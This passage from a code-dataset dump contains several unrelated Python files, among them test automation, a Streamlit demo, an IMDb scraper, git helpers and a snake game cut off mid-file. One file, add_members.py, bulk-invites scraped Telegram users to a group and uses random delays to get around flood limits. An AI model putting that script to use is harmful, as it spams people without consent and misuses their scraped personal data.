uncommented\"\nelse:\n\tline = \"/*\" + line\n\tline = line + \"*/\"\n\tmsg = \"Code block in selection commented\"\nsys.stdout.write(line)\nexit(msg)\n\n## Set gedit external tools params as below:\n## \"Save\" ==> \"Current Document\"\n## \"Input\" ==> \"Current Selection\"\n## \"Output\" ==> \"Replace Current Selection\"\n","sub_path":"mysql_block_comment_toggle.py","file_name":"mysql_block_comment_toggle.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"500224736","text":"from Base.BaseElementEnmu import Element as be\nfrom Base.BaseOperate import OperateElement\nfrom Base.BaseYaml import getYam\nfrom PageObject.SumResult import statistics_result\n\n\nclass HistorySwipeDelPage:\n\n    def __init__(self, kwargs):\n        self.driver = kwargs[\"driver\"]\n        if kwargs.get(\"launch_app\", \"0\") == \"0\":\n            self.driver.launch_app()\n        self.path = kwargs[\"path\"]\n        self.operateElement = OperateElement(self.driver)\n        self.isOperate = True\n        test_msg = getYam(self.path)\n        self.testInfo = test_msg[\"testinfo\"]\n        self.testCase = test_msg[\"testcase\"]\n        self.testcheck = test_msg[\"check\"]\n        self.device = kwargs[\"device\"]\n        self.logTest = kwargs[\"logTest\"]\n        self.caseName = kwargs[\"caseName\"]\n        self.get_value = []\n        self.msg = \"\"\n\n    def operate(self):\n        for item in self.testCase:\n\n            result = self.operateElement.operate(item, self.testInfo, self.logTest, self.device)\n            if not result[\"result\"]:\n                msg = \"Falló durante la ejecución, verifique si el elemento existe\" + item[\"element_info\"]\n                m_s_g = self.msg + \"\\n\" if self.msg != \"\" else \"\"\n                self.msg = m_s_g + msg\n                print(msg)\n                self.testInfo[0][\"msg\"] = msg\n                self.isOperate = False\n                return False\n\n            if item.get(\"operate_type\", \"0\") == be.SWIPE_LEFT:\n                web_element = self.driver.find_elements_by_id(item[\"element_info\"])[item[\"index\"]]\n                start = 
web_element.location\n\n startx = start[\"x\"]\n starty = start[\"y\"]\n\n size1 = web_element.size\n\n width = size1[\"width\"]\n height = size1[\"height\"]\n\n endX = width + startx\n endY = height + starty\n self.driver.swipe(endX, endY, starty, endY)\n if item.get(\"operate_type\", \"0\") == be.GET_VALUE:\n self.get_value.append(result['text'])\n return True\n\n def checkPoint(self, kwargs={}):\n result = self.check()\n if result is not True and be.RE_CONNECT:\n self.msg = \"El caso de uso falló y se volvió a conectar una vez, el motivo del fallo:\" + self.testInfo[0][\n \"msg\"]\n self.logTest.buildStartLine(self.caseName + \"_No se pudo volver a conectar\")\n self.operateElement.switchToNative()\n self.driver.launch_app()\n self.isOperate = True\n self.get_value = []\n self.operate()\n result = self.check()\n self.testInfo[0][\"msg\"] = self.msg\n statistics_result(result=result, testInfo=self.testInfo, caseName=self.caseName,\n driver=self.driver, logTest=self.logTest, devices=self.device,\n testCase=self.testCase,\n testCheck=self.testcheck)\n return result\n\n def check(self, kwargs={}):\n result = True\n m_s_g = self.msg + \"\\n\" if self.msg != \"\" else \"\"\n\n if self.isOperate:\n for item in self.testcheck:\n resp = self.operateElement.operate(item, self.testInfo, self.logTest, self.device)\n if not resp[\"result\"]:\n msg = \"Por favor marque el elemento\" + item[\"element_info\"] + \"existe\"\n self.msg = m_s_g + msg\n print(msg)\n self.testInfo[0][\"msg\"] = msg\n result = False\n if resp[\"text\"] in self.get_value:\n msg = \"Error en la eliminación de datos, los datos antes de la eliminación son: \" + \".\".join(\n self.get_value) + \"Los datos adquiridos actualmente son:\" + resp[\"text\"]\n self.msg = m_s_g + msg\n print(msg)\n self.testInfo[0][\"msg\"] = msg\n break\n else:\n result = False\n return result\n\n\nif __name__ == \"__main__\":\n pass\n","sub_path":"PageObject/Home/HistorySwipeDellPage.py","file_name":"HistorySwipeDellPage.py","file_ext":"py","file_size_in_byte":4053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"26203879","text":"import streamlit as st\nimport extra_streamlit_components as stx\n\n\ndef show_cookie_manager_controls():\n st.write(\"# Cookie Manager\")\n\n cookie_manager = stx.CookieManager()\n\n st.subheader(\"All Cookies:\")\n\n cookies = cookie_manager.get_all()\n st.write(cookies)\n\n c1, c2, c3 = st.columns(3)\n\n with c1:\n st.subheader(\"Get Cookie:\")\n cookie = st.text_input(\"Cookie\", key=\"0\")\n\n clicked = st.button(\"Get\")\n\n if clicked:\n value = cookie_manager.get(cookie)\n st.write(value)\n with c2:\n st.subheader(\"Set Cookie:\")\n cookie = st.text_input(\"Cookie\", key=\"1\")\n val = st.text_input(\"Value\")\n\n if st.button(\"Add\"):\n cookie_manager.set(cookie, val)\n\n with c3:\n st.subheader(\"Delete Cookie:\")\n cookie = st.text_input(\"Cookie\", key=\"2\")\n\n if st.button(\"Delete\"):\n cookie_manager.delete(cookie)\n\n\ndef show_bouncing_image():\n st.write(\"# Bouncing Image\")\n\n image_url = \"https://streamlit.io/images/brand/streamlit-logo-secondary-colormark-darktext.svg\"\n stx.bouncing_image(image_source=image_url, animate=True, animation_time=2000, height=145, width=500)\n\n st.code(\"\"\"\n image_url = \"https://streamlit.io/images/brand/streamlit-logo-secondary-colormark-darktext.svg\"\n stx.bouncing_image(image_source=image_url, animate=True, animation_time=2000, height=145, width=500)\n \"\"\")\n\n\ndef show_top_bar():\n st.write(\"# Top 
Bar\")\n\n chosen_id = stx.tab_bar(data=[\n stx.TabBarItemData(id=1, title=\"ToDo\", description=\"Tasks to take care of\"),\n stx.TabBarItemData(id=2, title=\"Done\", description=\"Tasks taken care of\"),\n stx.TabBarItemData(id=3, title=\"Overdue\", description=\"Tasks missed out\"),\n ], default=1, return_type=int)\n\n st.info(f\"chosen_id = {chosen_id}, type = {type(chosen_id)}\")\n\n st.code(\"\"\"\n chosen_id = stx.tab_bar(data=[\n stx.TabBarItemData(id=1, title=\"ToDo\", description=\"Tasks to take care of\"),\n stx.TabBarItemData(id=2, title=\"Done\", description=\"Tasks taken care of\"),\n stx.TabBarItemData(id=3, title=\"Overdue\", description=\"Tasks missed out\"),\n ], default=1)\n \"\"\")\n\n\ndef show_stepper_bar():\n st.write(\"# Stepper Bar\")\n\n val = stx.stepper_bar(steps=[\"Ready\", \"Get Set\", \"Go\"])\n st.info(f\"Phase #{val}\")\n\n st.code(\"\"\"\n val = stx.stepper_bar(steps=[\"Ready\", \"Get Set\", \"Go\"])\n \"\"\")\n\n\nshow_cookie_manager_controls()\nst.write(\"_______\")\nshow_top_bar()\nst.write(\"_______\")\nshow_bouncing_image()\nst.write(\"_______\")\nshow_stepper_bar()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"114608587","text":"from telethon.sync import TelegramClient\nfrom telethon.tl.functions.messages import GetDialogsRequest\nfrom telethon.tl.types import InputPeerEmpty, InputPeerChannel, InputPeerUser\nfrom telethon.errors.rpcerrorlist import (PeerFloodError,\n UserChannelsTooMuchError,\n UserPrivacyRestrictedError,\n SessionPasswordNeededError,\n ChatWriteForbiddenError)\nfrom telethon.tl.functions.channels import InviteToChannelRequest\nimport sys\nimport csv\nimport traceback\nimport time\nimport random\n\nfrom constant import API_HASH, APP_ID, PASSWORD, PHONE_NO\n\napi_id = APP_ID\napi_hash = API_HASH\nphone = PHONE_NO\nclient = TelegramClient(phone, api_id, api_hash)\n\nclient.connect()\nif not client.is_user_authorized():\n client.send_code_request(phone)\n try:\n client.sign_in(phone, input('Enter the code: '))\n except SessionPasswordNeededError:\n client.sign_in(password=PASSWORD)\n\ninput_file = sys.argv[1]\nusers = []\nwith open(input_file, encoding='UTF-8') as f:\n rows = csv.reader(f, delimiter=\",\", lineterminator=\"\\n\")\n next(rows, None)\n for row in rows:\n user = {}\n user['username'] = row[0]\n user['user_id'] = int(row[1])\n user['access_hash'] = int(row[2])\n user['name'] = row[3]\n user[\"group\"] = row[4]\n user[\"group_id\"] = int(row[5])\n user[\"phone_number\"] = (row[6])\n users.append(user)\n\nchats = []\nlast_date = None\nchunk_size = 200\ngroups = []\n\nresult = client(\n GetDialogsRequest(offset_date=last_date,\n offset_id=0,\n offset_peer=InputPeerEmpty(),\n limit=chunk_size,\n hash=0))\nchats.extend(result.chats)\n\nfor chat in chats:\n try:\n if chat.megagroup == True:\n groups.append(chat)\n if chat.broadcast == True:\n groups.append(chat)\n except:\n continue\n\nprint('Choose a group to add members:')\ni = 0\nfor group in groups:\n print(str(i) + '- ' + group.title)\n i += 1\n\ng_index = input(\"Enter a Number: \")\ntarget_group = groups[int(g_index)]\n\ntarget_group_entity = InputPeerChannel(target_group.id,\n target_group.access_hash)\n\nmode = int(input(\"Enter 1 to add by username or 2 to add by ID: \"))\n\nn = 0\n\nfor user in users:\n n += 1\n if n % 50 == 0:\n time.sleep(900)\n try:\n print(\"Adding {}\".format(user['user_id']))\n if mode == 1:\n if 
user['username'] == \"\":\n continue\n user_to_add = client.get_input_entity(user['username'])\n elif mode == 2:\n user_to_add = InputPeerUser(user['user_id'], user['access_hash'])\n else:\n sys.exit(\"Invalid Mode Selected. Please Try Again.\")\n client(InviteToChannelRequest(target_group_entity, [user_to_add]))\n print(\"Waiting for 60-180 Seconds...\")\n time.sleep(random.randrange(60, 180))\n except PeerFloodError:\n print(\n \"Getting Flood Error from telegram. Script is stopping now. Please try again after some time.\"\n )\n except UserPrivacyRestrictedError:\n print(\n \"The user's privacy settings do not allow you to do this. Skipping.\"\n )\n except UserChannelsTooMuchError:\n print(\"User in too much channel. Skipping.\")\n except ChatWriteForbiddenError:\n print(\"You do not have the right to add people to this group\")\n quit()\n except:\n traceback.print_exc()\n print(\"Unexpected Error\")\n continue","sub_path":"add_members.py","file_name":"add_members.py","file_ext":"py","file_size_in_byte":3661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"28458408","text":"'''\nAuthor @ Subhamoy Karmakar\n\nThis is the Module where\n\nInput:\n\nOutput:\n'''\nimport xml.etree.ElementTree as ET\nfrom PolicyCaseFrameVariables import *\n\n\ndef parseXml(fileName):\n tree = ET.parse(fileName)\n root = tree.getroot()\n i = 0\n for child in root:\n tag = str(child.tag)\n if tag == 'policy-name':\n pname = str(child.text)\n elif tag == 'policy-statement':\n pstatement = child.text\n elif tag == 'meta-action':\n meta = child.text\n elif tag == 'action':\n action = child.text\n elif tag == 'condition':\n tmp = root.findall('./condition/con')\n for t in tmp:\n condition.append(t.text)\n elif tag == 'agent':\n tmp = root.findall('./agent/agent-name')\n for t in tmp:\n agent.append(t.text)\n elif tag == 'co-agent':\n tmp = root.findall('./co-agent/co-agent-name')\n for t in tmp:\n coagent.append(t.text)\n elif tag == 'object':\n t_name = root.findall('./object/asset/name')\n t_atype = root.findall('./object/asset/access-type')\n for tn in t_name:\n objasset.append([tn.text, ''])\n for ta in t_atype:\n objasset[i][1] = ta.text\n i = i + 1\n elif tag == 'instrument':\n i = 0\n iname = root.findall('./instrument/ins/name')\n iver = root.findall('./instrument/ins/ver')\n for tn in iname:\n inst.append([tn.text, ''])\n for ta in iver:\n inst[i][1] = ta.text\n i = i + 1\n elif tag == 'recipient':\n i = 0\n rip = root.findall('./recipient/rec/ip')\n rport = root.findall('./recipient/rec/port')\n ratype = root.findall('./recipient/rec/access-type')\n for tn in rip:\n recipient.append([tn.text, '', ''])\n for ta in rport:\n recipient[i][1] = ta.text\n i = i + 1\n i = 0\n for ty in ratype:\n recipient[i][2] = ty.text\n i = i + 1\n elif tag == 'beneficiery':\n tmp = root.findall('./beneficiery/ben')\n for t in tmp:\n beneficiery.append(t.text)\n elif tag == 'time':\n i = 0\n rip = root.findall('./time/constraint/operator')\n rport = root.findall('./time/constraint/high')\n ratype = root.findall('./time/constraint/low')\n for tn in rip:\n time.append([tn.text, '', ''])\n for ta in rport:\n time[i][1] = ta.text\n i = i + 1\n i = 0\n for ty in ratype:\n time[i][2] = ty.text\n i = i + 1\n elif tag == 'site':\n iname = root.findall('./site/location')\n for tn in iname:\n site.append(tn.text)\n elif tag == 'cyber-location':\n iname = root.findall('./cyber-location/cloc')\n for tn in iname:\n cloc.append(tn.text)\n\n\nif '__main__':\n 
parseXml('remote_access_policy_caseframe.xml')\n","sub_path":"PHASE-1.1_IMPROVEMENT_PHASE/POLICOMP_TOOL/ParsePolicyCaseFrame.py","file_name":"ParsePolicyCaseFrame.py","file_ext":"py","file_size_in_byte":3227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"22759079","text":"# -*- coding: utf-8 -*-\n# Copyright (c) 2020, Brandmand and contributors\n# For license information, please see license.txt\n\nfrom __future__ import unicode_literals\nimport frappe\nfrom frappe.model.document import Document\n\nclass Almacen(Document):\n\tpass\n\n\n@frappe.whitelist()\ndef get_permission_query_conditions(user):\n\trelacion = frappe.get_doc(\"Relacion Usuario\", user)\n\n\ttablaActual = \"tabAlmacen\"\n\n\tif relacion.tipo_relacion == \"Cliente\" or relacion.tipo_relacion == \"Proveedor\":\n\t\tfrappe.throw(\"Perfil de usuario inválido\")\n\n\tcadena = \" 1=1 \"\n\tcadenaInvalida = \" 1!=1 \"\n\n\tif relacion.tipo_relacion == \"Administrador\":\n\t\tcadena = cadena + \" AND ({tabla}.empresa = '{empresa}')\".format(tabla=tablaActual, empresa=relacion.empresa)\n\n\t\tif relacion.cliente:\n\t\t\tcadena = cadena + \" AND ({tabla}.cliente = '{cliente}')\".format(tabla=tablaActual, cliente=relacion.cliente)\n\n\t\tif relacion.area:\n\t\t\tcadena = cadena + \" AND ({tabla}.area = '{area}')\".format(tabla=tablaActual, area=relacion.area)\n\n\t\tif relacion.unidad_medica:\n\t\t\tcadena = cadena + \" AND ({tabla}.unidad_medica = '{unidad_medica}')\".format(tabla=tablaActual, unidad_medica=relacion.unidad_medica)\n\telse:\n\t\tif relacion.empresa:\n\t\t\tcadena = cadena + \" AND ({tabla}.empresa = '{empresa}')\".format(tabla=tablaActual, empresa=relacion.empresa)\n\t\telse:\n\t\t\treturn cadenaInvalida\n\n\t\tif relacion.cliente:\n\t\t\tcadena = cadena + \" AND ({tabla}.cliente = '{cliente}')\".format(tabla=tablaActual, cliente=relacion.cliente)\n\t\telse:\n\t\t\treturn cadenaInvalida\n\n\t\tif relacion.area:\n\t\t\tcadena = cadena + \" AND ({tabla}.area = '{area}')\".format(tabla=tablaActual, area=relacion.area)\n\t\telse:\n\t\t\treturn cadenaInvalida\n\n\t\tif relacion.unidad_medica:\n\t\t\tcadena = cadena + \" AND ({tabla}.unidad_medica = '{unidad_medica}')\".format(tabla=tablaActual, unidad_medica=relacion.unidad_medica)\n\t\telse:\n\t\t\treturn cadenaInvalida\n\t\t\t\t\n\t# cadena = cadena + \" AND ({tabla}.cliente IN (SELECT name FROM 'tabCliente' WHERE empresa = '{empresa}')\".format(tabla=tablaActual, empresa=relacion.empresa)\n\n\treturn cadena\n #return \"(tabevent.event_type='public' or tabevent.owner='{user}'\".format(user=frappe.session.user)\n","sub_path":"medmanager/inventario/doctype/almacen/almacen.py","file_name":"almacen.py","file_ext":"py","file_size_in_byte":2139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"595145000","text":"#!/usr/bin/env python3\n\nimport csv\nimport requests\nfrom bs4 import BeautifulSoup\n\n\ndef construct_person_url(person_id):\n return f'http://www.imdb.com/name/{person_id}/'\n\n\ndef retrieve_person_name(person_id):\n person_url = construct_person_url(person_id)\n\n page = requests.get(person_url)\n soup = BeautifulSoup(page.content, 'html.parser')\n\n name = soup.find('span', {'itemprop': 'name'}).get_text()\n\n return {\n 'imdb_id': person_id,\n 'name': name\n }\n\n\ndef get_director_list():\n source_csv_path = './data/diva_film_data.csv'\n source_file = csv.reader(open(source_csv_path, 'r'))\n\n director_list = []\n\n next(source_file, None) # skips 
the headers\n\n for row in source_file:\n director_column = row[3]\n split_directors = director_column.split(',')\n for item in split_directors:\n if len(item) != 0:\n director_list.append(item.strip())\n\n return list(set(director_list))\n\n\ndef get_actor_list():\n source_csv_path = './data/diva_film_data.csv'\n source_file = csv.reader(open(source_csv_path, 'r'))\n\n actor_list = []\n\n next(source_file, None) # skips the headers\n\n for row in source_file:\n actor_column = row[8]\n split_actors = actor_column.split(',')\n for item in split_actors:\n if len(item) != 0:\n actor_list.append(item.strip())\n\n return list(set(actor_list))\n\n\ndef retrieve_names(id_list):\n names_and_ids = []\n\n for id in id_list:\n name_and_id = retrieve_person_name(id)\n print(\"name_and_id: \", name_and_id)\n names_and_ids.append(name_and_id)\n\n return names_and_ids\n\n\ndef write_data_to_csv(film_data, type):\n output_csv_path = f'./data/{type}_names.csv'\n output_file = open(output_csv_path, 'w')\n\n film_data_fieldnames = ['imdb_id', 'name']\n\n writer = csv.DictWriter(output_file, fieldnames=film_data_fieldnames)\n\n writer.writeheader()\n\n for row in film_data:\n print(f'Writing row: {row}')\n\n writer.writerow(row)\n\n output_file.close()\n\n\ndirector_list = get_director_list()\ndirector_name_data = retrieve_names(director_list)\n\nwrite_data_to_csv(director_name_data, 'director')\n\nactor_list = get_actor_list()\ntotal_actors = len(actor_list)\n\nall_actor_name_data = []\ncount = 1\n\nfor actor in actor_list:\n name_data = retrieve_person_name(actor)\n print(f'Person number {count} of {total_actors}.')\n print(f'Printing name_data for {actor}. Name data: {name_data}')\n all_actor_name_data.append(name_data)\n count += 1\n\nprint('About to write actor data out to CSV.')\n\nwrite_data_to_csv(all_actor_name_data, 'actor')\n\nprint('Finished!')\n","sub_path":"scripts/get_names_from_ids.py","file_name":"get_names_from_ids.py","file_ext":"py","file_size_in_byte":2666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"169537580","text":"from .program import PROGRAM\nfrom .program import safe_git\nfrom pathlib import Path\n\nCOMMIT_ID_LENGTH = 7\n\n\ndef find_git_root(p='.'):\n p = Path(p).absolute()\n while not (p / '.git' / 'config').exists():\n if p.parent == p:\n return None\n p = p.parent\n return p\n\n\ndef commit_id(name='HEAD', short=False):\n try:\n if name.startswith('~'):\n name = 'HEAD' + name\n elif name.isnumeric() and len(name) < COMMIT_ID_LENGTH:\n name = 'HEAD~' + name\n\n id = safe_git('rev-parse', name, quiet=True)[0]\n if short:\n return id[:COMMIT_ID_LENGTH]\n return id\n\n except Exception:\n return\n\n\ndef fetch(remote):\n fetched = safe_git.fetch(remote)\n while fetched and not fetched.startswith('From '):\n fetched.pop(0)\n if fetched:\n for f in fetched:\n PROGRAM.message(f)\n\n\ndef branch_name(name='HEAD'):\n return safe_git('symbolic-ref', '-q', '--short', name)[0].strip()\n\n\ndef is_workspace_dirty():\n if not find_git_root():\n return False\n try:\n safe_git('diff-index', '--quiet', 'HEAD', '--')\n except Exception:\n # Also returns true if workspace is broken for some other reason\n return True\n\n\ndef branches(*args):\n return safe_git.branch('--format=%(refname:short)', *args)\n\n\ndef remote_branches():\n remotes = safe_git.remote()\n\n for remote in remotes:\n fetch(remote)\n\n result = {}\n for rb in branches('-r'):\n remote, branch = rb.split('/')\n result.setdefault(remote, []).append(branch)\n return 
result\n\n\ndef upstream_branch():\n # https://stackoverflow.com/a/9753364/43839\n lines = safe_git(*_UPSTREAM, quiet=True)\n return lines[0].split('/', maxsplit=1)\n\n\ndef check_git():\n if not find_git_root():\n PROGRAM.error(_ERROR_NOT_GIT_REPOSITORY)\n PROGRAM.exit()\n\n\ndef check_clean_workspace():\n check_git()\n if is_workspace_dirty():\n PROGRAM.error(_ERROR_CHANGES_OVERWRITTEN)\n PROGRAM.exit()\n\n\ndef force_flags():\n return ['--force-with-lease'] if PROGRAM.args.force else []\n\n\n_UPSTREAM = 'rev-parse --abbrev-ref --symbolic-full-name @{u}'.split()\n_ERROR_CHANGES_OVERWRITTEN = 'Your local changes would be overwritten'\n_ERROR_NOT_GIT_REPOSITORY = (\n 'fatal: not a git repository (or any of the parent directories): .git'\n)\n","sub_path":"gitz/git_functions.py","file_name":"git_functions.py","file_ext":"py","file_size_in_byte":2364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"272071441","text":"from tkinter import *\n\nroot=Tk()\nroot.geometry(\"300x300\")\n\nButton(root,text=\"Hover Me!\",cursor=\"hand2\").pack(pady=100)\n\nroot.mainloop()\n\n#You Can also use below given stylings in place of \"hand2\"\n\"\"\"\nlist = [\n \"arrow\",\n \"circle\",\n \"clock\",\n \"cross\",\n \"dotbox\",\n \"exchange\",\n \"fleur\",\n \"heart\",\n \"man\",\n \"mouse\",\n \"pirate\",\n \"plus\",\n \"shuttle\",\n \"sizing\",\n \"spider\",\n \"spraycan\",\n \"star\",\n \"target\",\n \"tcross\",\n \"trek\",\n]\n\"\"\"\n","sub_path":"Cursor.py","file_name":"Cursor.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"341512748","text":"from food import *\nfrom power_up import *\nfrom snake import *\nimport os\n\n\ndef draw_grid(surface):\n for y in range(0, int(GRID_HEIGHT)):\n for x in range(0, int(GRID_WIDTH)):\n r = pygame.Rect((x * GRIDSIZE, y * GRIDSIZE), (GRIDSIZE, GRIDSIZE))\n pygame.draw.rect(surface, Color.GRID_1.value, r)\n\n\ndef get_new_game_status():\n return {Status.SCORE: BASE_GAME_SCORE,\n Status.SPEED: BASE_GAME_SPEED,\n Status.SCORE_FACTOR: BASE_GAME_SCORE_FACTOR}\n\n\ndef _draw_everthing_on_screen(power_up, snakes, game_status, food, surface, screen, game_font, image_dict):\n for snake in snakes:\n snake.draw(surface, game_status)\n food.draw(surface)\n if power_up:\n power_up.draw(surface)\n screen.blit(surface, (0, 0))\n\n if power_up:\n power_up.write_text(screen, game_font)\n\n # draw players scores:\n text_player_1 = game_font.render(f\"Score {game_status[Status.SCORE]}\", 1, Color.FONT_1.value)\n screen.blit(text_player_1, (SCREEN_WIDTH - 100, 10))\n if len(snakes) == 1:\n text_player_2 = game_font.render(f\"Player2: press space to join\", 1, Color.FONT_2.value)\n else:\n screen.blit(image_dict[\"keyboard_player2\"], (10, 5))\n text_player_2 = game_font.render(f\"Player2 Keys\", 1, Color.FONT_2.value)\n screen.blit(text_player_2, (5, 10))\n pygame.display.update()\n\n\ndef choose_power_up():\n number = random.randint(1, 100)\n if number <= 40:\n return DoubleSpeed()\n elif number <= 80:\n return DoubleScore()\n elif number <= 95:\n return RandomPowerup()\n else:\n return ShortenSnake()\n\n\ndef handle_power_up(power_up, snakes, cur_snake, game_status):\n if power_up is None and 0 <= pygame.time.get_ticks() % 300 <= 10: # after some time there is no power up on screen\n power_up = choose_power_up()\n\n if power_up is not None:\n if cur_snake.get_head_position() == power_up.get_position(): # if snake eat power up\n 
power_up.active(game_status, snakes) # active it's effect\n power_up = None # remove power up\n\n # TODO handle this better\n # if speed power up duration has finished, remove it's effect\n if Status.SPEED_POWERUP_DURATION in game_status.keys():\n game_status[Status.SPEED_POWERUP_DURATION] -= 0.1\n if game_status[Status.SPEED_POWERUP_DURATION] < 0:\n del game_status[Status.SPEED_POWERUP_DURATION]\n game_status[Status.SPEED] = BASE_GAME_SPEED\n\n # if Score power up duration has finished, remove it's effect\n if Status.SCORE_POWER_UP_DURATION in game_status.keys():\n game_status[Status.SCORE_POWER_UP_DURATION] -= 0.1\n if game_status[Status.SCORE_POWER_UP_DURATION] < 0:\n del game_status[Status.SCORE_POWER_UP_DURATION]\n game_status[Status.SCORE_FACTOR] = BASE_GAME_SCORE_FACTOR\n\n return power_up\n\n\ndef handle_keys(snakes):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n exit()\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_UP:\n snakes[0].turn(UP)\n elif event.key == pygame.K_DOWN:\n snakes[0].turn(DOWN)\n elif event.key == pygame.K_LEFT:\n snakes[0].turn(LEFT)\n elif event.key == pygame.K_RIGHT:\n snakes[0].turn(RIGHT)\n elif event.key == pygame.K_SPACE and len(snakes) == 1:\n snakes.append(Snake(Player.PLAYER_2))\n if len(snakes) >= 2:\n if event.key == pygame.K_w:\n snakes[1].turn(UP)\n if event.key == pygame.K_s:\n snakes[1].turn(DOWN)\n if event.key == pygame.K_a:\n snakes[1].turn(LEFT)\n if event.key == pygame.K_d:\n snakes[1].turn(RIGHT)\n\n\ndef reset_snakes(snakes):\n pygame.time.wait(GAME_OVER_DELAY)\n for snake in snakes:\n snake.reset()\n\n\ndef get_other_snake_positions(snakes, number_of_players, i):\n if number_of_players == 1:\n return None\n if i == 0:\n return snakes[1].positions\n return snakes[0].positions\n\n\ndef update_hall_of_fame(new_score):\n \"\"\":return boolean - True if new scored enter 'hall_of_fame', else False \"\"\"\n # file does not exist -> create it\n if not os.path.isfile(HALL_OF_FAME_FILE_NAME):\n with open(HALL_OF_FAME_FILE_NAME, \"w\") as file1:\n file1.write(str(new_score))\n return True\n\n # file exist:\n with open(HALL_OF_FAME_FILE_NAME, \"r+\") as file1:\n scores_string = file1.read()\n current_scores = [int(score) for score in scores_string.split(\",\")]\n current_min = min(current_scores)\n if len(current_scores) < HALL_OF_FAME_SCORES_MAX_AMOUNT or new_score > current_min:\n if len(current_scores) < HALL_OF_FAME_SCORES_MAX_AMOUNT: # there is a slot left -> enter the new score\n current_scores.append(new_score)\n elif new_score > current_min: # new score is higher then current score-> replace old score with new score\n current_scores[current_scores.index(current_min)] = new_score\n print(\"you are a champion\")\n\n scores_string = \",\".join([str(score) for score in sorted(current_scores, reverse=True)])\n with open(HALL_OF_FAME_FILE_NAME, \"w\") as file1:\n file1.write(str(scores_string))\n return True\n # didn't enter hall of fame\n return False\n\n\ndef print_hall_of_fame(enter_hall_of_fame, new_score, screen, hall_of_fame_font, image_dict):\n screen.fill((40, 40, 40))\n text = hall_of_fame_font.render(\"Hall Of Fame\", 1, Color.FONT_1.value)\n x_pos, y_pos = int(SCREEN_WIDTH / 3), 50\n screen.blit(text, (x_pos, y_pos))\n\n with open(HALL_OF_FAME_FILE_NAME, \"r+\") as file:\n scores = file.read().split(\",\")\n\n for place, score in enumerate(scores):\n if enter_hall_of_fame and str(new_score) == score:\n text = hall_of_fame_font.render(f\"{score} (you)\", 1, Color.FONT_2.value)\n 
enter_hall_of_fame = False\n else:\n text = hall_of_fame_font.render(score, 1, Color.FONT_1.value)\n y_pos = y_pos + 50\n screen.blit(text, (x_pos, y_pos))\n medal = None\n if place == 0:\n medal = image_dict[\"medal_gold\"]\n elif place == 1:\n medal = image_dict[\"medal_silver\"]\n elif place == 2:\n medal = image_dict[\"medal_bronze\"]\n if medal is not None:\n screen.blit(medal, (x_pos - GRIDSIZE * 5, y_pos))\n pygame.display.update()\n pygame.time.delay(GAME_OVER_DELAY * 2)\n\n\ndef print_game_over(screen, game_over_img):\n screen.blit(game_over_img, (int(SCREEN_WIDTH / 2 - GRIDSIZE*3), int(SCREEN_HEIGHT / 2 - GRIDSIZE*3)))\n pygame.display.update()\n pygame.time.delay(GAME_OVER_DELAY)\n\n\ndef load_game_images(icons_directory = \"icons\"):\n \"\"\" load the classes images, and return the rest of the images (dict)\"\"\"\n\n # create a dict with all the game's images\n image_filenames = os.listdir(icons_directory) # returns list\n image_dict = dict()\n for image_file in image_filenames:\n without_suffix = image_file.split(\".\")[0]\n image_dict[without_suffix] = pygame.image.load(os.path.join(icons_directory, image_file))\n\n # resize classes images and set them\n large_greed = int(GRIDSIZE * 1.3)\n Apple.img = pygame.transform.scale(image_dict['apple'], (large_greed, large_greed))\n Banana.img = pygame.transform.scale(image_dict['banana'], (large_greed, large_greed))\n DoubleScore.img = pygame.transform.scale(image_dict['double_score'], (large_greed, large_greed))\n DoubleSpeed.img = pygame.transform.scale(image_dict['double_speed'], (large_greed, large_greed))\n ShortenSnake.img = pygame.transform.scale(image_dict['shorten_snake'], (large_greed, large_greed))\n RandomPowerup.img = pygame.transform.scale(image_dict['random_powerup'], (large_greed, large_greed))\n\n # resize the remaining images and return them:\n remaining_images = dict()\n remaining_images['game_over'] = pygame.transform.scale(image_dict['game_over'], (GRIDSIZE*6, GRIDSIZE*6))\n medal_size = (GRIDSIZE*3, GRIDSIZE*3)\n remaining_images['medal_gold'] = pygame.transform.scale(image_dict['medal_gold'], medal_size)\n remaining_images['medal_silver'] = pygame.transform.scale(image_dict['medal_silver'], medal_size)\n remaining_images['medal_bronze'] = pygame.transform.scale(image_dict['medal_bronze'], medal_size)\n remaining_images['keyboard_player2'] = pygame.transform.scale(image_dict['keyboard_player2'], medal_size)\n return remaining_images\n\ndef main():\n # Initialize the pygame\n pygame.init()\n\n # create the screen\n screen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT), 0, 32)\n surface = pygame.Surface(screen.get_size()) # .convert()\n draw_grid(surface)\n\n # Title and Icon\n pygame.display.set_caption(\"Co-Snake\")\n icon = pygame.image.load(\"icons/game_icon.png\")\n pygame.display.set_icon(icon)\n\n image_dict = load_game_images()\n clock = pygame.time.Clock()\n game_font = pygame.font.SysFont(\"monospace\", 16)\n hall_of_fame_font = pygame.font.SysFont(\"monospace\", 28)\n\n snakes = [Snake(Player.PLAYER_1)]\n food = Apple()\n power_up = DoubleScore()\n game_status = get_new_game_status()\n while True:\n clock.tick(game_status[Status.SPEED])\n handle_keys(snakes)\n number_of_players = len(snakes)\n draw_grid(surface)\n\n for i, cur_snake in enumerate(snakes):\n game_over = cur_snake.move(other_snake_positions=get_other_snake_positions(snakes, number_of_players, i))\n if game_over:\n print_game_over(screen, image_dict[\"game_over\"])\n enter_hall_of_fame = 
